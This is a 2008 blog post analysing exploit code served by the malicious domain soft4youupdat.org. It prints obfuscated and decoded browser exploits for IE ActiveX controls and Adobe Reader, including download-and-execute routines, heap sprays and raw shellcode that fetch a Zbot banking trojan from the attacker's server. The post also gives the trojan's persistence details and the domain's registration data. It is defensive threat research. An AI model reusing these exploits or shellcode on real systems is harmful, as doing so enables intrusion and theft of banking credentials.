The analysis of exploit code hosted at soft4youupdat.org results in the typical TTP that includes malicious obfuscated JavaScript, browser-based IE exploits, banking credential stealing malware and ISPs with dubious reputations. The story follows...
A request for http://soft4youupdat.org/counts/index.php returns 3 sections of obfuscated exploit code and an iframe for hxxp://soft4youupdat(dot)org.
(1)
<script>opdYzUDi=document.location.href;if(opdYzUDi.indexOf('http://')!=-1){eval('Tgwm\x61Tgwm\x7aTgwm…….truncated…….\x7bTgwm\x7dTgwm\x7d'.replace(/Tgwm/g, ''));}</script>
(2)
<script>ftXokBk6=document.location.href;if(ftXokBk6.indexOf('http://')!=-1){eval('qyT\x66qyT\x75qyT…….truncated…….\x7bqyT\x7dqyT\x7d'.replace(/qyT/g, ''));}</script>
(3)
<html><iframe src="hxxp://soft4youupdat(dot)org/counts/cache/doc.pdf" widht="1" height="1"></iframe></html>
(4)
<script>hu7AMj=document.location.href;if(hu7AMj.indexOf('http://')!=-1){eval('MZnVp\x76MZnVp\x61MZnVp…….truncated…….\x28MZnVp\x29MZnVp\x3b'.replace(/MZnVp/g, ''));}</script>
The JavaScript replace() Method is used to obfuscate the exploit code. The replace() Method syntax is
stringObject.replace(findstring,newstring)
A 'g' flag is used to perform a global search and an 'i' flag is used to perform a case-insensitive search.
Exploit Block 1
The first block of exploit code globally replaces the characters Tgwm with the empty string ". The decoded section returns a string of escaped hexadecimal characters.
eval('\x61\x7a\x20\x3d\x20\x6e\x65\x77\x20\x41\x72\x72\x61\x79\x28\x29\x3b\x61\x7a\x2e\x70\x75\x73\x68\x28\x27\x68\x5e\x74\x26\x74\x70\x29…….truncated…….\x7b\x7d\x7d')
The hexadecimal character string decodes to reveal additional code that again uses the JavaScript replace() Method for obfuscation. The script decodes to reveal MDAC RDS.Dataspace ActiveX Control Vulnerability (CVE-2006-0003, MS06-014) exploit code. The payload is a GET request for hxxp://soft4youupdat(dot)org/counts/bin/default.exe.
az = new Array();az.push('h^t&tp)&://#$s$o#)ft4!yo*uup!da)t.)or*g!$/c((ou*n@ts!/)b#i%$n!/!@def!a^&u(l*t.exe#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));for(i = 0; i <= az.length - 1; i++){ start(az[i], '.%/$/*@..^#/)@/f)i#(le#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '') + i + '.(e(^x^e!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));}function start(sUrl, sPath) { var z = document.createElement('o&b!j))e*ct!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));z.setAttribute('id'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''),'z'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); z.setAttribute('clas@s!!i$!d@$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'cl%(s&id:)B*D^9%6#C(5*^56&-^*65A3$-^11(D!(0-98*3A%-0#0(C%(0^4@FC@2(9(&E36$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));try { var q = z.CreateObject('m&s!(xm@l%2.^&X&@M*LH@@T%T%*P'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); var s = z.CreateObject('Sh$@el#l).A%)p(pli&c$^a$t((ion'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));var t = z.CreateObject('a@do%db^).$#s$)t%(r!eam'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), ''.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '')); try { t.type = 1; q.open('GE!T'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), sUrl, false);q.send(); t.open(); t.write(q.responseBody); t.savetofile(sPath,2); t.close();} catch(e) {}try { s.shellexecute(sPath); if(shellexecute=true) { var b = new ActiveXObject('M)icros@#oft*&.X)$M^L&!H%&T&TP!'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));b.open('G!ET#'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''), 'l*$o%!ad).php^#?)m@dc='.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, '') + Math.random()); b.send(null); }} catch(e){}} catch(e){}}
Exploit Block 2
The second block of exploit code uses the same obfuscation technique decoding to reveal Microsoft Access Snapshot Viewer ActiveX Control Vulnerability (CVE-2008-2463, MS08-041) exploit code. The payload is hxxp://soft4youupdat(dot)org/counts/load.php?ssv=' + Math.random().
function killErrors() { return true; } window.onerror = killErrors; var x; var obj;var myarr = new Array(); myarr[0] = 'c:\\Program Files\\Outlook Express\\wab.exe';myarr[1] = 'd:\\Program Files\\Outlook Express\\wab.exe';myarr[2] = 'e:\\Program Files\\Outlook Express\\wab.exe';setTimeout('window.location = "ldap://127.0.0.1"', 5000);for (x in myarr){obj = new ActiveXObject('snpv$w@.S$*n%(a&ps&h%)o$t!$ Vi)ew&e&$r)# Co$n&t(ro$l.*%1$'.replace(/\!|@|#|\$|%|\^|&|\*|\(|\)/ig, ''));try{var buf1 = 'http://soft4youupdat(dot)org/counts/load.php?ssv=' + Math.random();var buf2 = myarr[x]; obj.Zoom = 0;obj.SnapshotPath = buf1; obj.CompressedPath = buf2; obj.PrintSnapshot();}catch(e){}}
Exploit Block 3
The third block of exploit code included an iframe for hxxp://soft4youupdat(dot)org/counts/cache/doc.pdf. The PDF contained buffer overflow exploit code targeted against a vulnerability in the JavaScript method Collab.collectEmailInfo() in Adobe PDF Reader’s JavaScript Engine (CVE-2007-5659, APSB08-13). The PDF metadata indicates it was created with Scribus 1.3.3.12 which provides desktop publishing for Linux/Unix. Scribus provides a step by step guide for beginning to enhance PDF with JavaScript. The creation date is 8-6-08.
13 0 obj
<>
Stream
[filter FlateDecode has been applied to the JavaScript bitstream]
endstream
endobj
12 0 obj
<>
endobj
14 0 obj
<<>
/Producer (Scribus PDF Library 1.3.3.12)
/Author <>
/Keywords <>
/Trapped /False
/ModDate (D:20080806014227)
/CreationDate (D:20080806014227)
>>
Endobj
The tool Pdftk - the PDF Toolkit can be used to inflate the FlateDecode JavaScript. The tool syntax is:
pdftk input.pdf output output.pdf uncompress
The exploit shellcode payload is a GET request for hxxp://soft4youupdat(dot)org/counts/load.php?pdf=35f4a8d465e6e1edc05f3d8ab658c551.
function rvcfcd208495d565e()
{
var rvc4ca4238a0b9238 = new Array();
function rvc81e728d9d4c2f6(rveccbc87e4b5ce2f, rva87ff679a2f3e71)
{
while (rveccbc87e4b5ce2f.length * 2 < rveccbc87e4b5ce2f =" rveccbc87e4b5ce2f.substring(0," rv1679091c5a880fa =" 0x0c0c0c0c;" rv8f14e45fceea167 =" unescape(" rvc9f0f895fb98ab9 =" 0x400000;" rv45c48cce2e2d7fb =" rv8f14e45fceea167.length" rva87ff679a2f3e71 =" rvc9f0f895fb98ab9" rveccbc87e4b5ce2f =" unescape(" rveccbc87e4b5ce2f =" rvc81e728d9d4c2f6(rveccbc87e4b5ce2f," rvd3d9446802a4425 =" (rv1679091c5a880fa" rv6512bd43d9caa6e =" 0;" rvc51ce410c124a10 =" app.viewerVersion.toString();" rvc51ce410c124a10 =" rvc51ce410c124a10.replace(/\D/g," rvaab3238922bcc25 =" new" rv9bf31c7ff062936 =" unescape(" collabstore =" Collab.collectEmailInfo({subj:">
Exploit Block 4
The fourth block of exploit code uses the same obfuscation technique decoding to reveal 3 buffer overflow exploits:
• COM Object Instantiation Memory Corruption Vulnerability (CVE-2005-2127, MS05-052)
• Online Media Technologies NCTsoft NCTAudioFile2 ActiveX buffer overflow - CVE-2007-0018
• Microsoft Visual Studio 'Msmask32.ocx' ActiveX Control Remote Buffer Overflow Vulnerability (MS08-070)
The shellcode payload for all 3 exploits is hxxp://soft4youupdat(dot)org/counts/load.php?bof=3c59dc048e8850243be8079a5c74d079.
var Shellcode = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u732F%u666F%u3474%u6F79%u7575%u6470%u7461%u6F2E%u6772%u632F%u756F%u746E%u2F73%u6F6C%u6461%u702E%u7068%u623F%u666F%u333D%u3563%u6439%u3063%u3834%u3865%u3538%u3230%u3334%u6562%u3038%u3937%u3561%u3763%u6434%u3730%u0039");function geSpyrrSlirrdep(sssprassydddbSliiide, saruuysaddize){while (sssprassydddbSliiide.length * 2 < sssprassydddbsliiide =" sssprassydddbSliiide.substring(0," hpsdyytttscess =" 0x0c0c0c0c;var" hadttdtsize =" 0x400000;var" payfdlytyusade =" Shellcode.length" tggter =" payfdLytyusade" saruuysaddize =" hadttdtSize" sssprassydddbsliiide =" unescape(" prrerat =" new" sssprassydddbsliiide =" geSpyrrSlirrdep(sssprassydddbSliiide," kilrrer =" hpsdyytttscess" hsttiicks =" kilrrer" i =" 0;" ugric =" unescape(" xyz =" 0x40000;while(ugric.length" ugric =" ugric.substring(0," bublic =" new" i =" bublic;">');zorro = Math.ceil(0xd0d0d0d);zorro = document.scripts[0].createControlRange().length;}catch(e) {}setTimeout("startAudioFile()", 2000);}function startAudioFile(){try{var mmed = document.createElement("object");mmed.setAttribute("classid", "clsid:77829F14-D911-40FF-A2F0-D11DB8D6D0BC");var mms="";for(var i=0; i < body =" '';var buf1 = '';for (i = 1; i <= 1945; i++){buf1 = buf1 + unescape(" href="http://google.com/">
Malware Analysis
The payload for all of the soft4youupdat(dot)org exploits is the same binary file.
Filename: bin_default.exe/default.exe
MD5: d9b7bf5b02fa9d1fc9da041916ff0a5e
Size: 59,392 bytes
The malware is a Zbot trojan which steals online banking information and downloads additional malware.
The following files are created:
%System%\ntos.exe
0xB01F2D6531F9EC917E8996ED5962DB48
308,736 bytes
%System%\wsnpoem\audio.dll
%System%\wsnpoem\video.dll
The following registry key is created to launch the malware at startup:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] Userinit = "%System%\userinit.exe,%System%\ntos.exe,"
Virus total indicates a low detection rate for this particular variant at the time of analysis [Result: 9/38 (23.68%)]
Domain Analysis
The domain soft4youupdat.org was registered 11-20-08 at Everyones Internet, Ltd.
Domain ID:D154732571-LROR Domain
Name:SOFT4YOUUPDAT.ORG
Created On:20-Nov-2008 12:59:45 UTC
Last Updated On:20-Nov-2008 13:19:16 UTC
Expiration Date:20-Nov-2009 12:59:45 UTC
Sponsoring Registrar:Everyones Internet, Ltd. (R1381-LROR)
Status:TRANSFER PROHIBITED
Registrant ID:tul8MyjB2Dv7rqIF
Registrant Name:Vladimir Mashkov
Registrant Organization:N/A
Registrant Street1:st. Lenin's 56 square 43
Registrant Street2:
Registrant Street3:
Registrant City:Moscow
Registrant State/Province:Moscow
Registrant Postal Code:10010
Registrant Country:RU
Registrant Phone:+7.4950784576
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email: mailto:andrea12a@inbox.ru
The domain soft4youupdat.org currently resolves to 67.228.139.26 which is registered to the Plano, TX company SOFTLAYER Technologies Inc. (ASN AS36351, 67.228.128.0/18).
aut-num: AS36351
as-name: SOFTLAYER
descr: SoftLayer Technologies Inc.
import: from AS-ANY accept ANY AND NOT {0.0.0.0/0}
export: to AS-ANY announce AS36351
admin-c: IPADM258-ARIN
tech-c: IPADM258-ARIN
notify: noc@softlayer.com
mnt-by: MAINT-AS36351
changed: ipadmin@softlayer.com 20060110
source: RADB
SOFTLAYER Technologies Inc leased IP space to Innovation IT Solutions Corp which is an international communications company headquartered in London, UK.
Innovation IT Solutions Corp. NET-67-228-139-0 (NET-67-228-139-0-1)
67.228.139.0 - 67.228.139.127
SOFTLAYER Technologies Inc is listed by StopBadware.org in their top 10 worst network block owners and the McColo Cyber Crime USA – V2.0 report lists the ISP in the top 5 worst network block owners. Both IT Solutions Corp and SOFTLAYER Technologies Inc have been previously tied to RBN activity and the Russian Cyberwar on Georgia.
Friday, December 19, 2008
soft4youupdat.org Exploit Analysis
Subscribe to:
Post Comments (Atom)
No comments:
Post a Comment